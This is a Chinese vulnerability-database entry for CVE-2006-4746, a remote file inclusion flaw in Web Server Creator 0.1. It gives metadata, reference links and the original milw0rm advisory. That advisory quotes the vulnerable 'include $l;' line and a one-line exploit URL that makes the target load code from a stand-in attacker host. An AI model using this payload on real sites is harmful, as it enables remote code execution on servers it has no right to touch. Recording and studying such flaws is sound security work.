Web Server Creator 0'customize.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110973 漏洞类型 未知
发布时间 2006-09-07 更新时间 2006-09-13
CVE编号 CVE-2006-4746 CNNVD-ID CNNVD-200609-192
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2318
https://www.securityfocus.com/bid/84151
https://cxsecurity.com/issue/WLB-2006090096
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-192
|漏洞详情
WebServerCreator0.1的news/include/customize.php中的PHP远程文件包含漏洞,远程攻击者可以通过l参数中的URL执行任意PHP代码。
|漏洞EXP
###########################################################

#Web Server Creator v0.1 (l) Remote Include Vulnerability

############################################################

#Author: XORON

############################################################

#URL: http://www.comscripts.com/jump.php?action=script&id=1082

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:   include $l;

############################################################

#Exploit:
http://www.site.com/[path]/news/include/customize.php?l=http://evil_scripts?

############################################################

#Greetz: str0ke, Ironfist, Preddy, SHiKaA,  gültekin

############################################################

# milw0rm.com [2006-09-07]
|受影响的产品
comscripts.com Web Server Creator 0.1
|参考资料

来源:BUGTRAQ
名称:20060908WebServerCreatorv0.1(l)RemoteIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/445725/100/0/threaded
来源:MILW0RM
名称:2318
链接:http://milw0rm.com/exploits/2318
来源:SREASON
名称:1568
链接:http://securityreason.com/securityalert/1568